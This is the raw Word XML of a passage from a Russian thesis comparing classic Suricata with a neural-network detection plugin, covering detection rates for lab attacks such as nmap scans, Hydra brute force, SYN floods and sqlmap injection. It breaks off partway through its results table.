    <w:p w14:paraId="65928A45" w14:textId="5600A24C" w:rsidR="0099286E" w:rsidRPr="00CA2F69" w:rsidRDefault="008E0171" w:rsidP="00772345">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A1F1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таким образом, ни один из рассмотренных подходов не обеспечивает надёжного обнаружения SSRF-атак на уровне единичного запроса. Данная проблема характерна для всех систем, анализирующих только метаданные потоков, и не является специфичной для разработанной модели.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Итого: классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 0 срабатываний, нейросетевой плагин — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">0 </w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>срабатываний.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52513A1A" w14:textId="73691A34" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009D45A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc231673293"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="005135C4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00402025">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="005135C4">
        <w:t xml:space="preserve"> Сравнительный анализ результатов работы классической </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005135C4">
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005135C4">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005135C4">
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005135C4">
        <w:t xml:space="preserve"> с нейросетевым плагином</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112EDABA" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D89DEE5" w14:textId="3ABCCC80" w:rsidR="008E0171" w:rsidRPr="00F967C5" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F967C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В ходе экспериментального исследования разработанный нейросетевой плагин продемонстрировал высокую эффективность обнаружения атак. Из 14 проведённых тестов 12 были успешно обнаружены. Тест №6 (криптографические сбои, пассивный перехват трафика) исключён из оценки, так как данный тип пассивной атаки принципиально не может быть обнаружен ни одной сетевой системой обнаружения вторжений — злоумышленник не генерирует собственный трафик и не вносит изменений в характеристики сетевых потоков.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D38E26A" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00F967C5" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F967C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Таким образом, нейросетевой плагин обнаружил 12 из 13 активных сценариев атак — эффективность 92.3%. Единственным случаем необнаружения стала SSRF-атака через единичный HTTP-запрос к уязвимому параметру File </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F967C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Inclusion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F967C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. При малом объёме трафика менее 10 пакетов за сессию статистические характеристики потока неотличимы от легитимного веб-трафика. Данное ограничение характерно для всех систем, анализирующих только метаданные сетевых потоков, и не является специфичным для разработанной модели.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A52D393" w14:textId="5BCEF752" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F967C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Отдельно следует отметить результаты теста №2 (перебор учётных данных). </w:t>
      </w:r>
      <w:r w:rsidR="009A57A4" w:rsidRPr="00F967C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Брут форс</w:t>
      </w:r>
      <w:r w:rsidRPr="00F967C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> веб-формы DVWA плагин не обнаружил — медленный перебор через HTTP неотличим от легитимного трафика. Однако </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A57A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidR="009A57A4" w:rsidRPr="00F967C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рут</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A57A4" w:rsidRPr="00F967C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> форс</w:t>
      </w:r>
      <w:r w:rsidRPr="00F967C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH был успешно обнаружен — 156 срабатываний с уверенностью 100%. Это объясняется тем, что SSH-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A57A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidR="009A57A4" w:rsidRPr="00F967C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рут</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A57A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A57A4" w:rsidRPr="00F967C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>форс</w:t>
      </w:r>
      <w:r w:rsidRPr="00F967C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> создаёт характерный паттерн множества коротких соединений на порт 22, статистически отличимый от нормального трафика.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668B8AC9" w14:textId="75E612E8" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD19DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">По результатам проведённого тестирования выполнен сравнительный анализ эффективности двух подходов к обнаружению угроз. Сводные результаты представлены в таблице </w:t>
      </w:r>
      <w:r w:rsidR="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD19DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E945BD6" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="0099286E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C187A26" w14:textId="77777777" w:rsidR="00772345" w:rsidRPr="00532842" w:rsidRDefault="00772345" w:rsidP="0099286E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C93FBB4" w14:textId="3163E742" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="002E66B7">
      <w:p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Таблица </w:t>
      </w:r>
      <w:r w:rsidR="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Сводные результаты тестов</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1276"/>
        <w:gridCol w:w="1417"/>
        <w:gridCol w:w="1418"/>
        <w:gridCol w:w="1275"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="2E1CC998" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="615"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5414B485"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Тип атаки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="395E3D77"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OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F68CE54"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MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22C04D06"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Алертов</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Suricata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4657B738"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Алертов</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> плагин</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="7742AFA9" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="915"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="216E956D"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Сетевая разведка (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A673BD5"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A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="556F2DEC"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T1046</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2541A4E2"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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="625F2606"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71</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="0F55D375" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="615"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5459CD6C"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Брутфорс</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Hydra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="142A78C9"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A07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C68749C"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T1110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E4E6A5A"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7152C4D3"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156</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="1759D3C7" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="615"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A9DEC45"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SYN-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>flood</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (hping3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="477DF8D2"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A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46BF5D64"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T1498</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="366E9BA5"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124</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C55EC5F"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20 292</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD74AB" w:rsidRPr="00BD74AB" w14:paraId="11CDF5F9" w14:textId="77777777" w:rsidTr="00BD74AB">
        <w:trPr>
          <w:trHeight w:val="915"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4253" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C1E35E8"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SQL-инъекция (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BD74AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E070375"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A03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E1C9B36"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T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
